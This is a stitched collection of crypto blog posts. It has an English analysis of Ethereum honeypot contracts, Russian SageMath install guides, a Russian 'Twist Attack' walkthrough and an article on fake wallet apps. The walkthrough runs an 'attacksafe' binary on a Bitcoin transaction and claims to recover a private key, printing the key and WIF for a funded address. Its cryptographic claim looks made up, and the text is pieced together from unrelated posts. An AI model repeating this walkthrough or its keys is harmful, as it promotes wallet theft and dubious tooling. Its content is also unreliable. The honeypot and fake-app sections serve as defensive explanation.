However, in this section of this blog post, the deployer exploits some features related to etherscan platform to hide some important information that may trick users. Hidden State Update The Etherscan platform helps developers and any Ethereum Blockchain user to debug his smart contract or track his transactions. Therefore, the platform display user’s transaction and internal messages that are performed by smart contracts. However, one of the features of Etherscan is that it does not show internal messages with an empty value. Therefore, smart contract honeypot deployer exploit this feature to trick users and change the smart contract behavior. Here is an example to better understand this concept: Check the following smart contract: https://etherscan.io/address/0x8bbf2d91e3c601df2c71c4ee98e87351922f8aa7#code This contract might be used as a honeypot, as the user could be fooled by the initial value of the variable passHasBeenSet. By checking the Etherscan data he would not be able to see any transaction that has changed the value of passHasBeenSet. Therefore, he would assume that the value didn’t change and attempt to exploit the contract. To do that, the user would try to exploit the contract by sending more than one ether to the contract using the GetGift() after setting the hashPass using SetPass() function. However, the passHasBeenSet variable might be already changed by another contract and that would not be seen in the etherscan platform. Straw Man Contract This technique is built upon showing a source code for a contract that is not actually the one used by the contract. For example, the deployer could build a contract that requires another library and that that library address is initialized during the deployment of the contract or by calling a specific function. At this stage, there is nothing that holds the deployer from using another contract address that is totally different than the one that the source code is displayed in Etherscan. Unfortunately, this really a tricky honeypot and a really difficult technique to discover from a user. I mean the user should verify the addresses of the deployed contract and the different transactions and data passed to the contract to be able to find this issue. Moreover, even if the user tries to test this smart contract in a different contract, he will use the smart contract code displayed by the attacker and he will see a normal behavior. Which makes it even more difficult to find the issue. Here is an example of such a honeypot, try to take a look at it and see what makes this smart contract a honeypot: https://etherscan.io/address/0xdc5c87ba250b65a83042333f1101940b74312a65#code Etherscan is an Ethereum blockchain explorer that, besides other features, allows developers to submit the code of the smart contracts they deploy. The main benefit of this feature is that it allows users to check what contracts do by reading their source code. Etherscan makes sure that the code matches the smart contract as deployed. The list of verified contracts is long. As of this writing, Etherscan offers the source code for 26055 contracts, which can be browsed here. On a lazy Sunday afternoon I decided to casually browse it to see what kind of contracts people were running and get a sense of what people use the blockchain for, and how well written and secure these contracts are. Most contracts I found implemented tokens, crowdsales, multi-signature wallets, ponzis, and.. honeypots! Honeypot contracts are the most interesting findings to me. Such contracts hold ether, and pretend to do so insecurely. In short, they are scam contracts that try to fool you into thinking you can steal the ether they hold, while in fact all you can do is lose ether. A common pattern they follow is, in order to retrieve the ether they hold, you must send them some ether of your own first. Of course, if you try that, you’re in for a nasty surprise: the smart contract eats up your ether, and you find out that the smart contract does not do what you thought it did. In this post I will analyze a couple honeypot contracts I came across, and explain what they seem to do, but really do. The not-really-insecure non-lottery The first contract I will go through implements a lottery that, apparently, is horribly insecure and easy to steal from with a guaranteed win. I have come across several of these. The last instance I found is deployed at address 0x8685631276cfcf17a973d92f6dc11645e5158c0c, and its source code can be read here. I am copying the code below for convenience. Can you spot the bait? Can you tell why, if you try to exploit it, you will actually lose ether? pragma solidity ^0.4.23;// CryptoRoulette // // Guess the number secretly stored in the blockchain and win the whole contract balance! // A new number is randomly chosen after each try. // // To play, call the play() method with the guessed number (1-16). Bet price: 0.2 ethercontract CryptoRoulette { uint256 private secretNumber; uint256 public lastPlayed; uint256 public betPrice = 0.001 ether; address public ownerAddr; struct Game { address player; uint256 number; } Game[] public gamesPlayed; constructor() public { ownerAddr = msg.sender; shuffle(); } function shuffle() internal { // randomly set secretNumber with a value between 1 and 10 secretNumber = 6; } function play(uint256 number) payable public { require(msg.value >= betPrice && number <= 10); Game game; game.player = msg.sender; game.number = number; gamesPlayed.push(game); if (number == secretNumber) { // win! msg.sender.transfer(this.balance); } //shuffle(); lastPlayed = now; } function kill() public { if (msg.sender == ownerAddr && now > lastPlayed + 6 hours) { suicide(msg.sender); } } function() public payable { } } It’s easy to tell that the shuffle() method sets secretNumber to 6. Hence, if you call play(6)and send it 0.001 ether, you will always win your ether plus whatever the balance of the contract is, namely 0.015 ether. Easy money, right? Wrong. What’s the trick? Look closely at how play() is implemented. It declares a variable Game game, but does not initialize it. It will therefore default to a pointer to slot zero of the contract’s storage space. Then, it stores your address in its first member, storage slot 0, and the submitted number in the second one, that maps to storage slot 1. So, in practice, this will end up overwriting the contract’s secretNumber with the attacker account’s address, and lastPlayed with the number submitted. Then, it will compare secretNumber, which is now your account’s address, with the number you submitted. Since you can only submit numbers smaller than 10, you can only win if your account’s address is within the range 0x0 to 0x0a. (Don’t bother trying to bruteforce-search for one account in that small range! Simply unfeasible.) So, the comparison will fail, and the contract will keep your ether. Of course, the attacker can at any time call kill() to retrieve the ether. The not-really-insecure non-riddle This is another fun one. It had me scratching my head for a while. However, there is a huge giveaway that the contract is up to something nasty right away. But let’s not get ahead of ourselves. Here is its code. Can you spot the supposed vulnerability? And, can you tell why an exploit won’t work? And what is the giveaway I was talking about? contract G_GAME { function Play(string _response) external payable { require(msg.sender == tx.origin); if(responseHash == keccak256(_response) && msg.value>1 ether) { msg.sender.transfer(this.balance); } } string public question; address questionSender; bytes32 responseHash; function StartGame(string _question,string _response) public payable { if(responseHash==0x0) { responseHash = keccak256(_response); question = _question; questionSender = msg.sender; } } function StopGame() public payable { require(msg.sender==questionSender); msg.sender.transfer(this.balance); } function NewQuestion(string _question, bytes32 _responseHash) public payable { require(msg.sender==questionSender); question = _question; responseHash = _responseHash; } function() public payable{} } The code supposedly implements a riddle. It sets up a question, and, if you can tell what the answer is, it will presumably send you its balance, currently a little more than 1 ether. Of course, to produce an answer, you must send an ether first, which you will get back if you are correct. The code seems fine, but there is a dirty trick: notice how NewQuestion allows questionSender to submit a hash that does not match _question. So, as long as this function isn’t used, we should be alright. Can we tell what the question and answer are? If you read the transaction history of the contract on etherscan, it appears that the 2nd transaction sets up the question. It’s even more obvious if you click the “Convert to UT8” button on etherscan. This reveals the question “I am very easy to get into,but it is hard to get out of me. What am I?”, and the answer “TroublE”. Since this transaction is called, according to etherscan, after the creation of the contract, responseHash is going to be zero, and will become keccak265("TroublE"). Then, there is a third transaction that loads up one ether in the contract. So, apparently, we could call Play("TroublE") and send one ether to get two ether back. Too good to be true? Probably. Let’s make sure. We can make sure we will the contract’s ether by inspecting the state of the smart contract. Its variables are not public, but still all it takes is just a few extra strokes to retrieve their values by querying the blockchain. questionSender and responseHash are the 2nd and 3rd variables, so they will occupy slots 1 and 2 on the storage space of the smart contract. Let’s retrieve their values. web3.eth.getStorageAt(‘0x3caf97b4d97276d75185aaf1dcf3a2a8755afe27’, 1, console.log); The result is `0x0..0765951ab946f3a6f0379680a6b05fb807d52ba09`. That spells trouble (pun intended) for an attacker, since the transaction setting up the question came from an account starting with0x21d2. Something’s up. web3.eth.getStorageAt(‘0x3caf97b4d97276d75185aaf1dcf3a2a8755afe27’, 2, console.log); The result is `0xc3fa7df9bf24…`. Is this the hash of “TroublE”? web3.sha3('TroublE'); That call returns 0x92a930d5..., so it turns out that, if we were to call Play("TroublE") and send 1 ether, we’d actually lose it. But how is it possible that the hashes do not match? Notice how StartGame does nothing if responseHash is already set. Clearly, that second transaction did not alter the state of the contract, so it must have already been set before this transaction. But how is it possible that responseHash was already initialized, if that was the first transaction after the creation of the contract? After some serious head scratching, I found a recent interesting post on honeypot contracts that explains that Etherscan does not show transactions between contracts when msg.value is zero. Other blockchain explorers such as Etherchain do show them. Surely enough, etherchain reveals a couple additional transactions in the contract’s history, where a contract at 0x765951.. modifies responseHash via a zero-value transactions. So let’s check these transactions; perhaps the ether can still be stolen? To track what happened, we need to decode these calls. We can get the contract’s ABI from Etherscan, and the internal transaction data from the “parity traces” of Etherchain (first, second). That’s all we need to decode the transactions into human readable format. const abiDecoder = require('abi-decoder'); const Web3 = require('web3'); const web3 = new Web3();const abi = [{“constant”:false,”inputs”:[{“name”:”_question”,”type”:”string”},{“name”:”_response”,”type”:”string”}],”name”:”StartGame”,”outputs”:[],”payable”:true,”stateMutability”:”payable”,”type”:”function”},{“constant”:false,”inputs”:[{“name”:”_question”,”type”:”string”},{“name”:”_responseHash”,”type”:”bytes32"}],”name”:”NewQuestion”,”outputs”:[],”payable”:true,”stateMutability”:”payable”,”type”:”function”},{“constant”:true,”inputs”:[],”name”:”question”,”outputs”:[{“name”:””,”type”:”string”}],”payable”:false,”stateMutability”:”view”,”type”:”function”},{“constant”:false,”inputs”:[{“name”:”_response”,”type”:”string”}],”name”:”Play”,”outputs”:[],”payable”:true,”stateMutability”:”payable”,”type”:”function”},{“constant”:false,”inputs”:[],”name”:”StopGame”,”outputs”:[],”payable”:true,”stateMutability”:”payable”,”type”:”function”},{“payable”:true,”stateMutability”:”payable”,”type”:”fallback”}];const data1 = '0x1f1c827f000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000c000000000000000000000000000000000000000000000000000000000000000464920616d2076657279206561737920746f2067657420696e746f2c627574206974206973206861726420746f20676574206f7574206f66206d652e205768617420616d20493f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000754726f75626c4500000000000000000000000000000000000000000000000000';const data2 = '0x3e3ee8590000000000000000000000000000000000000000000000000000000000000040c3fa7df9bf247d144f6933776e672e599a5ed406cd0a15a9f2da09055b8f906700000000000000000000000000000000000000000000000000000000000000464920616d2076657279206561737920746f2067657420696e746f2c627574206974206973206861726420746f20676574206f7574206f66206d652e205768617420616d20493f0000000000000000000000000000000000000000000000000000';abiDecoder.addABI(abi); console.log(abiDecoder.decodeMethod(data1)); console.log(abiDecoder.decodeMethod(data2)); Running this code, we get the following result: { name: ‘StartGame’, params: [ { name: ‘_question’, value: ‘I am very easy to get into,but it is hard to get out of me. What am I?’, type: ‘string’ }, { name: ‘_response’, value: ‘TroublE’, type: ‘string’ } ] } { name: ‘NewQuestion’, params: [ { name: ‘_question’, value: ‘I am very easy to get into,but it is hard to get out of me. What am I?’, type: ‘string’ }, { name: ‘_responseHash’, value: ‘0xc3fa7df9bf247d144f6933776e672e599a5ed406cd0a15a9f2da09055b8f9067’, type: ‘bytes32’ } ] } We learn that the first transaction sets the answer to keccak256("TroublE"), but the second one sets the answer to a hash value for which we don’t know the original data! Again it’s quite easy to miss that the second call does not use _question to compute the hash; instead, it’s set to an arbitrary value that does not match the string provided in the previous call, although the question does match. So, unless we can find out a value that produces the given hash, possibly via a dictionary attack or a bruteforce search, we’re out of luck. And, given how sophisticated this honeypot is, I would assume trying to bruteforce the hash is not going to work out very well for us. Unraveling this honeypot took quite some effort. Its creator is ultimately counting on attackers trusting the etherscan data, which does not contain the full picture. The giveaway I said this contract contains a dead giveaway that its creator is playing tricks. This is in this line: require(msg.sender == tx.origin); What this line achieves is, it prevents contracts from calling Play. This is because tx.origin is always an “external account”, and never a smart contract. Why is this useful for the attacker? A way to safely attack a contract is to call them from an “attack contract” that reverts execution if it didn’t gain ether from attack: function attack() { uint intialBalance = this.balance; attack_contract(); require (this.balance > initialBalance); } This way, unless the attacker’s contract’s balance increases, the transaction fails altogether. The creator of the honeypot wants to prevent an attacker from using this trick to protect themselves. Literature: ETHEREUM: A SECURE DECENTRALISED GENERALISED TRANSACTION LEDGER BERLIN VERSION beacfbd – 2022-10-24 DR. GAVIN WOOD FOUNDER, ETHEREUM & PARITY From Smart to Secure Contracts: Automated Security Assessment and Improvement of Ethereum Smart Contracts Christof Ferreira Torres The Art of The Scam: Demystifying Honeypots in Ethereum Smart Contracts Christof Ferreira Torres, Mathis Steichen, and Radu State, University of Luxembourg A survey of attacks on Ethereum smart contracts Nicola Atzei, Massimo Bartoletti, and Tiziana Cimoli Conclusion Honeypots are a moral grey area for me. Is it OK to scam those who are looking to steal from contracts? I don’t think so. But I do not feel very strongly about this. In the end, if you got scammed, it is because you were searching for smart contracts to steal from to begin with. These scams play on the greed of people who are smart enough to figure out an apparent vulnerability in a contract, yet not knowledgeable enough to figure out what the underlying trap is. If you want to get deeper into Smart Contract security, check this amazing wargame called Capture the Ether. It’s a fun way to hone your skills and train your eye for suspicious Solidity code. GitHub Telegram: https://t.me/cryptodeeptech Video: https://youtu.be/UrkOGyuuepE Source: https://cryptodeep.ru/solidity-vulnerable-honeypots Криптоанализ Навигация по записям
  12. CryptoDeepTech

    Установим SageMath в Google Colab

    CRYPTO DEEP TECH В этой статье мы сделаем новую установку SageMath в Google Colab. Ранее мы опубликовали статью: “Install SageMath for cryptanalysis on Fedora 64bit(10GB) Cloud Virtual Server” , но для продолжение криптоанализа блокчейна Биткоин многие наши читатели предпочитают использовать Debian и Ubuntu в отличие от Fedora. Как нам известно Google Colab обновился до версии "Ubuntu 20.04.5 LTS". !cat /etc/lsb-release Поэтому версии "Ubuntu 20.04.5 LTS", нам позволяет установит только SageMath version 9.0, Release Date: 2020-01-01 Используя стандартную команду установки: !sudo apt-get install -y sagemath-common Для полного проведения криптоанализа мы установим в Google Colab совершенно новую версию SageMath version 9.3 Файл: Install_SageMath_in_Google_Colab.ipynb мы опубликовали в GitHub Перейдем на официальный сайт: https://colab.research.google.com Теперь через утилиту wget скачаем tar-file: sage-9.3-Ubuntu_20.04-x86_64.tar.bz2 !wget https://cryptodeeptech.ru/sage-9.3-Ubuntu_20.04-x86_64.tar.bz2 !tar -xf sage-9.3-Ubuntu_20.04-x86_64.tar.bz2 cd SageMath/ !python3 relocate-once.py Все готово! !./sage -sh sage -v Все верно! Мы получили новую версию: SageMath version 9.3, Release Date: 2021-05-09 wget https://raw.githubusercontent.com/demining/CryptoDeepTools/bbd83042e7405508cd2e646ad1b0819da0f9c58d/18TwistAttack/discrete.py Теперь чтобы получить приватный ключ нам осталось запустить команду: python3 discrete.py Sage Math 9.3 выполним задачу дискретного логарифмирование (Pollard's rho algorithm for logarithms) Теперь все работает должный образом! Исходный код Telegram: https://t.me/cryptodeeptech Видеоматериал: https://youtu.be/DBu0UnVe0ig Источник: https://cryptodeep.ru/install-sagemath-in-google-colab Криптоанализ
  13. В этой статье мы подробно на слайдах покажем как установить «SageMath» на облачный виртуальный сервер Fedora 30 64bit(10GB) для примера мы будем использовать сервера «DIGITAL RUBLE TECH». Ранее мы использовали для установки «SageMath» облачный сервис Google Colab, но к сожалению из-за последних обновлении не все компоненты для проведение криптоанализа блокчейна Биткоина работают должным образом. Регистрация: cat /etc/redhat-release dnf check-update dnf install python3 dnf install sagemath sage -v git clone https://github.com/demining/CryptoDeepTools.git cd CryptoDeepTools/18TwistAttack/ ls Чтобы решить дискретное логарифмирование (Pollard's rho algorithm for logarithms) запустим Python-script: discrete.py Команда запуска: sage -python3 discrete.py Sage Math выполнил задачу дискретного логарифмирование (Pollard's rho algorithm for logarithms) Теперь все работает должный образом! Исходный код DIGITAL RUBLE TECH Telegram: https://t.me/cryptodeeptech Видеоматериал: https://youtu.be/xHnTDRgZwvE Источник: https://cryptodeep.ru/install-sagemath-on-fedora Криптоанализ
  14. CRYPTO DEEP TECH В этой статье мы реализуем Twist Attack на примере №2 согласно первой теоретической части статьи мы убедились что с помощью определенных точек на эллиптической кривой secp256k1 мы можем получить частичные значение приватного ключа и в течение 5-15 минут восстановить Биткоин Кошелек используя “Sagemath pollard rho function: (discrete_log_rho)” и “Chinese Remainder Theorem”. https://github.com/christianlundkvist/blog/blob/master/2020_05_26_secp256k1_twist_attacks/secp256k1_twist_attacks.md Согласно твиту Paulo Barreto: https://twitter.com/pbarreto/status/825703772382908416?s=21 The cofactor is 3^2*13^2*3319*22639 E1: 20412485227 E2: 3319, 22639 E3: 109903, 12977017, 383229727 E4: 18979 E6: 10903, 5290657, 10833080827, 22921299619447 prod = 20412485227 * 3319 * 22639 *109903 * 12977017 * 383229727 * 18979 * 10903 * 5290657 * 10833080827 * 22921299619447 38597363079105398474523661669562635951234135017402074565436668291433169282997 = 3 * 13^2 * 3319 * 22639 * 1013176677300131846900870239606035638738100997248092069256697437031 HEX:0x55555555555555555555555555555555C1C5B65DC59275416AB9E07B0FEDE7B5 E1: y^2 = x^3 + 1 E2: y^2 = x^3 + 2 E3: y^2 = x^3 + 3 E4: y^2 = x^3 + 4 E6: y^2 = x^3 + 6 https://attacksafe.ru/twist-attack-on-bitcoin y² = x³ + ax + b. In the Koblitz curve, y² = x³ + 0x + 7. In the Koblitz curve, 0 = x³ + 0 + 7 b '= -x ^ 3 - ax. Перейдем к экспериментальной части: (Рассмотрим Биткоин Адрес) (Теперь рассмотрим критический уязвимые транзакции) Откроем [TerminalGoogleColab]. Реализуем алгоритм Twist Attack с помощью нашей репозитории 18TwistAttack git clone https://github.com/demining/CryptoDeepTools.git cd CryptoDeepTools/18TwistAttack/ ls Установим все нужные нам пакеты requirements.txt sudo apt install python2-minimal wget https://bootstrap.pypa.io/pip/2.7/get-pip.py sudo python2 get-pip.py pip2 install -r requirements.txt , Подготовим RawTX для атаки RawTX = 01000000013edba424d1b614ec2182c8ac6856215afb803bcb9748c1888eecd35fffad67730e0000006b483045022100bbabd1cb2097e0053b3da453b15fd195a2bc1e8dbe00cfd60aee95b404d2abfa02201af66956a7ea158d32b0a56a46a83fe27f9e544387c8d0ce13cd2a54dba9a747012102912cd095d2c20e4fbdb20a8710971dd040a067dba45899b7156e9347efc20312ffffffff01a8020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000 Сохраним в файле: RawTX.txt Чтобы реализовать атаку мы воспользуемся программным обеспечение “ATTACKSAFE SOFTWARE” www.attacksafe.ru/software Права доступа: chmod +x attacksafe Применение: ./attacksafe -help -version: software version -list: list of bitcoin attacks -tool: indicate the attack -gpu: enable gpu -time: work timeout -server: server mode -port: server port -open: open file -save: save file -search: vulnerability search -stop: stop at mode -max: maximum quantity in mode -min: minimum quantity per mode -speed: boost speed for mode -range: specific range -crack: crack mode -field: starting field -point: starting point -inject: injection regimen -decode: decoding mode ./attacksafe -version Version 5.3.2. [ATTACKSAFE SOFTWARE, © 2023] "ATTACKSAFE SOFTWARE" включает в себя все популярные атаки на Биткоин. Запустим список всех атак: ./attacksafe -list Выберем -tool: twist_attack Чтобы получить определенные точки secp256k1 из уязвимой транзакции подписи ECDSA, мы добавили данные RawTX в текстовый документ и сохранил как файл RawTX.txt 01000000013edba424d1b614ec2182c8ac6856215afb803bcb9748c1888eecd35fffad67730e0000006b483045022100bbabd1cb2097e0053b3da453b15fd195a2bc1e8dbe00cfd60aee95b404d2abfa02201af66956a7ea158d32b0a56a46a83fe27f9e544387c8d0ce13cd2a54dba9a747012102912cd095d2c20e4fbdb20a8710971dd040a067dba45899b7156e9347efc20312ffffffff01a8020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000 Запустим -tool twist_attack используя программное обеспечение “ATTACKSAFE SOFTWARE” ./attacksafe -tool twist_attack -open RawTX.txt -save SecretPoints.txt Мы запустили данную атаку из -tool twist_attack и результат сохранился в файл SecretPoints.txt Теперь чтобы посмотреть успешный результат откроем файл SecretPoints.txt cat SecretPoints.txt Результат: Elliptic Curve Secret Points: Q11 = E1([97072073026593516785986136148833105674452542501015145216961054272876839453879, 107567253371779495307521678088935176637661904239924771700494716430774957820966]) Q21 = E2([3350296768277877304391506547616361976369787138559008027651808311357100316617, 72988900267653266243491077449097157591503403928437340215197819240911749073070]) Q22 = E2([112520741232779465095566100761481226712887911875949213866586208031790667764851, 67821409607391406974451792678186486803604797717916857589728259410989018828088]) Q31 = E3([19221018445349571002768878066568778104356611670224206148889744255553888839368, 51911948202474460182474729837629287426170495064721963100930541018009108314113]) Q32 = E3([41890177480111283990531243647299980511217563319657594412233172058507418746086, 50666391602993122126388747247624601309616370399604218474818855509093287774278]) Q33 = E3([42268931450354181048145324837791859216268206183479474730830244807012122440868, 106203099208900270966718494579849900683595613889332211248945862977592813439569]) Q41 = E4([54499795016623216633513895020095562919782606390420118477101689814601700532150, 105485166437855743326869509276555834707863666622073705127774354124823038313021]) Q61 = E6([62124953527279820718051689027867102514830975577976669973362563656149003510557, 100989088237897158673340534473118617341737987866593944452056172771683426720481]) Q62 = E6([86907281605062616221251901813989896824116536666883529138776205878798949076805, 19984923138198085750026187300638434023309806045826685297245727280111269894421]) Q63 = E6([66063410534588649374156935204077330523666149907425414249132071271750455781006, 25315648259518110320341360730017389015499807179224601293064633820188666088920]) Q64 = E6([109180854384525934106792159822888807664445139819154775748567618515646342974321, 102666617356998521143219293179463920284010473849613907153669896702897252016986]) RawTX = 01000000013edba424d1b614ec2182c8ac6856215afb803bcb9748c1888eecd35fffad67730e0000006b483045022100bbabd1cb2097e0053b3da453b15fd195a2bc1e8dbe00cfd60aee95b404d2abfa02201af66956a7ea158d32b0a56a46a83fe27f9e544387c8d0ce13cd2a54dba9a747012102912cd095d2c20e4fbdb20a8710971dd040a067dba45899b7156e9347efc20312ffffffff01a8020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000 Теперь добавим полученные точки secp256k1 Для этого откроем Python-script: discrete.py Для того чтобы запустить Python-script: discrete.py установим SageMath Команда установки: sudo apt-get update sudo apt-get install -y python3-gmpy2 yes '' | sudo env DEBIAN_FRONTEND=noninteractive apt-get -y -o DPkg::options::="--force-confdef" -o DPkg::options::="--force-confold" install sagemath Проверим установку SageMath по команде: sage -v SageMath version 9.0 Чтобы решить дискретное логарифмирование (Pollard's rho algorithm for logarithms) запустим Python-script: discrete.py Команда запуска: sage -python3 discrete.py Результат: Discrete_log_rho: 14996641256 1546 19575 31735 9071789 145517682 11552 7151 3370711 10797447604 10120546250224 PRIVATE KEY: 3160389728152122137789469305939632411648887242506549174582525524562820572318 privkey = crt([x11, x21, x22, x31, x32, x33, x41, x61, x62, x63, x64], [ord11, ord21, ord22, ord31, ord32, ord33, ord41, ord61, ord62, ord63, ord64]) Конвертируем приватный ключ в HEX формат Десятичный формат приватного ключа был сохранен в файл: privkey.txt Запустим Python-script: privkey2hex.py python3 privkey2hex.py cat privkey2hex.txt Откроем полученный файл: privkey2hex.txt Приватный ключ в HEX формате: PrivKey = 06fcb79a2eabffa519509e43b7de95bc2df15ca48fe6be29f9160bcd6ac1a49e Откроем bitaddress и проверим: ADDR: 1L7vTvRwmWENJm4g15rAxAtGcXjrFsWcBx WIF: KwTHx3AhV8qiN6qyfG1D85TGEeUBiaMUjnQ11eVLP5NAfiVNLLmS HEX: 06FCB79A2EABFFA519509E43B7DE95BC2DF15CA48FE6BE29F9160BCD6AC1A49E https://live.blockcypher.com/btc/address/1L7vTvRwmWENJm4g15rAxAtGcXjrFsWcBx/ BALANCE: $ 902.52 Исходный код ATTACKSAFE SOFTWARE Telegram: https://t.me/cryptodeeptech Видеоматериал: https://youtu.be/pOviZOYItv4 Источник: https://cryptodeep.ru/twist-attack-2 Криптоанализ
  15. CRYPTO DEEP TECH The rise of fake cryptocurrency apps and how to avoid them. Scammers are using fake crypto apps to steal funds from investors. Some malicious apps find their way into official app stores. And, according to the latest fraud report, fraudsters are using fake crypto apps to steal money from unsuspecting crypto investors. It highlights that American investors have lost approximately $42.7 million to swindlers through fake apps. The schemes reportedly take advantage of heightened interest in cryptocurrencies, especially during bull market runs, to beguile crypto users. How fake crypto app scammers lure users Fake crypto app scammers use myriad techniques to entice investors. The following is a breakdown of some of them. Social engineering schemes Some fake crypto app scammer networks use social engineering strategies to entice victims. In many cases, the fraudsters befriend the victims through social platforms such as dating sites and then trick them into downloading apps that appear to be functional cryptocurrency trading apps. The scammers then convince users to transfer funds to the app. The funds are, however, “locked in” once the transfer is made, and the victims are never allowed to withdraw money. In some cases, the scammers lure victims using outlandish high-yield claims. The ruse comes to an end when the victims realize that they can’t redeem their funds. Speaking to Cointelegraph earlier this week, Rick Holland, chief information security officer of Digital Shadows — a digital risk protection firm — underscored that social engineering remains a top strategy among crooks because it requires minimal effort. “Relying upon the tried-and-true method of social engineering is far more practical and lucrative,” he said. The cybersecurity manager added that social engineering makes it easy for scammers to target high-net-worth individuals. Context: Bob ( fake name, real person) received a text claiming to be from his exchange. The message states that due to the recent ban on crypto in China, all users must withdraw their funds to a defi wallet. The text also included a link to the wallet where Bob can transfer his funds. After downloading the wallet, Bob removed all of his funds from the exchange. More than $10 million in ERC20-USDT were transferred. Little did Bob know that he had just become the victim of a phishing scam. Bob reached out to us for help recovering his funds. Bob wasn’t the first person to contact us regarding these scams. Scams are becoming more common as interest in cryptocurrency grows. According to data from our MistTrack service, more than 60% of all reported hacks were related to fake wallets. There are several ways to protect yourself against phishing attacks: Never click on any link from an unknown source, even if it appears legitimate. Scammers frequently send emails or texts containing links to a fake wallet. Always go to the original website rather than clicking on sponsored ads. Scammers often purchase ad space on search engines to promote their counterfeit website that often appears genuine. Scammers will regularly message you pretending to help. After gaining your trust, they will send you a link to download their app and transfer funds to it. They will often fabricate why you cannot withdraw funds unless you deposit additional funds into it. Many who fall victim to these scams never receive their money back. Scammers would often pose as support from Metamask. They would pretend to help anyone currently having difficulties using Metamask. After gaining their trust, they would send over a link asking the victim to input their seed phase. Metamask will NEVER ask for your seed phrase or private key. This is what a fake Metamask wallet might look like. In-depth analysis Our team begins to analyze and research the information provided by these victims. According to our ongoing investigation, tens of thousands of victims had their assets stolen from these phishing scams. So far, the total amount stolen exceeds $1.3 billion. These are the only funds reported to SlowMist, and we only counted ETH, BTC, TRX, ERC20-USDT, and TRC20-USDT. The graph below depicts the number of reported cases to us during November. One victim provided us with the Tron address of the scammer. Using MistTrack, our team was able to track down and analyze the scammer’s address. It showed an additional 14 addresses that had transferred funds to this address. We can assume that these addresses also fell victims to this phishing scam. In total, the scammer was able to walk away with over $250,000 in Trc20-USDT. Which they later distributed to various Binance accounts. We followed one of these Binance accounts and discovered it had over $600,000 in TRC20 — USDT. Imagine the total amount stolen if this was just one of the addresses the scammer uses. As we investigated further into this account, we discovered more illegal activity associated with it. According to our AML(anti-money laundering) software, a BTC address associated with this account (32q…fia) was used for extortion. Through the investigation of this address, we concluded that these phishing schemes were not isolated events but rather part of a larger global scale. Furthermore, our research indicates that the scammer will frequently transfer portions of the funds to multiple exchanges and to another scammer wallet with a significant amount of transactions to confuse our analysis. Recognizable brand names Some fake crypto app scammers have resorted to using recognizable brand names to push fake apps because of the trust and authority that they wield. In one case highlighted in the latest crypto crime report, cybercriminals posing as YiBit employees recently hoodwinked investors out of some $5.5 million after convincing them to download a bogus YiBit crypto trading app. Unbeknown to the investors, the actual YiBit crypto exchange firm ceased operations in 2018. Fund transfers made to the fake app were stolen. In another case outlined in the report, phishers using the Supay brand name, which is associated with an Australian crypto company, swindled 28 investors out of millions of dollars. The ploy, which ran between Nov. 1 and Nov. 26, caused $3.7 million in losses. Such schemes have been going on for years, but many incidences go unreported due to the lack of proper recourse channels, especially in jurisdictions that shun cryptocurrencies. Besides the U.S., investigations in other major jurisdictions such as India have in the recent past uncovered elaborate fake crypto app schemes. According to a report published by the CloudSEK cybersecurity company in June, a newly discovered fake crypto app scheme involving numerous cloned apps and domains caused Indian investors to lose at least $128 million. Distributing fake apps through official app stores Fake crypto app scammers sometimes use official app stores to distribute dodgy applications. Some of the apps are designed to collect user credentials that are then used to unlock crypto accounts on corresponding official platforms. Others claim to offer secure wallet solutions that can be used to store a diverse range of cryptocurrencies but pilfer funds once a deposit is made. While platforms such as Google Play Store constantly review apps for integrity issues, it is still possible for some fake apps to slip through the cracks. One of the latest methods used by scammers to accomplish this is registering as app developers on popular mobile app stores such as the Apple App Store and Google Play Store and then uploading legitimate-looking apps. In 2021, a fake Trezor app masquerading as a wallet created by SatoshiLabs used this strategy to get published on both Apple App Store and Google Play Store. The app claimed to provide users with direct online access to their Trezor hardware wallets without needing to connect their Trezor dongle to a computer. Victims who downloaded the fake Trezor app were obligated to submit their wallet seed phrase to start using the service. A seed phrase is a string of words that can be used to access a cryptocurrency wallet on the blockchain. The submitted details allowed the thieves behind the fake app to loot user funds. According to a statement provided by Apple, the fake Trezor app was published on its store through a deceptive bait-and-switch maneuver. The app developers are alleged to have initially submitted the app as a cryptography application designed to encrypt files but later on converted it to a cryptocurrency wallet app. Apple said that it was not aware of the change until users reported it. Speaking to Cointelegraph earlier this week, Chris Kline, co-founder of Bitcoin IRA — a crypto retirement investment service — said that despite such incidents, major tech companies in the space were resolute in fighting fake crypto apps because of the potential damage to their integrity. He said: “Tech companies are always looking for better education and security for their users. The most reputable players today put security at the forefront of their roadmaps. Users need reassurance that their digital assets are safe and providers are keeping security top of mind.” That said, the fake app problem is more prevalent in non-official app stores. Cryptocurrency is risky enough without having to worry about scams. No matter which one you choose, you will deal with volatile values. Throw in some crooks, and the risk goes up exponentially. Social media is a goldmine for scammers to find new victims. Now, fake crypto ads are circulating on Facebook and other platforms. The ads use images of well-known industry leaders to lure people into buying crypto that doesn’t exist. Cybersecurity researchers recently found 40 copycat sites designed to look like legitimate crypto services. The sites advertise crypto wallet apps that are anything but legitimate. Keep reading to find out the risks and protect your finances. Watch your wallet Cryptocurrency wallets are physical or digital storage devices for your cryptocurrency. The wallets themselves hold public and private keys, which give you access to your crypto. How to spot a fake crypto app Fake cryptocurrency apps are designed to resemble legitimate apps as closely as possible. As a crypto investor, one should be able to discern between legitimate and fake apps to avoid unnecessary losses. The following is a breakdown of some of the things to look out for when trying to ascertain the authenticity of a mobile crypto application. Evidence shows that a crook is recruiting partners to distribute these bad apps via telemarketing, social media, advertisement, SMS, third-party channels, fake websites and more. ESET researchers also uncovered malicious wallets being distributed via legitimate Chinese websites, with articles containing links to fake wallet apps. The posts used real wallet names such as Coinbase, imToken, Bitpie, MetaMask, TokenPocket, OneKey and Trust Wallet but led to copycat websites. A thief used another legitimate Chinese website to post an article about Beijing’s crypto ban. The author included a list of genuine crypto wallets to get around the ban, along with links to bogus websites with download links for fake apps. Different effects on iOS and Android The malware works differently depending on your operating system. The fake Android wallet apps target new crypto users who do not have a legitimate wallet app installed on their devices. If you already have an official wallet app, the malicious one won’t be installed due to Android security measures, which don’t let you replace an original app with one that isn’t legitimate. The copycat websites let Android users download the malicious apps from their servers even if they tap on the “Get it on Google Play” button. Following that, the app needs to be installed manually. When it comes to iOS, multiple versions of an app can be installed simultaneously. 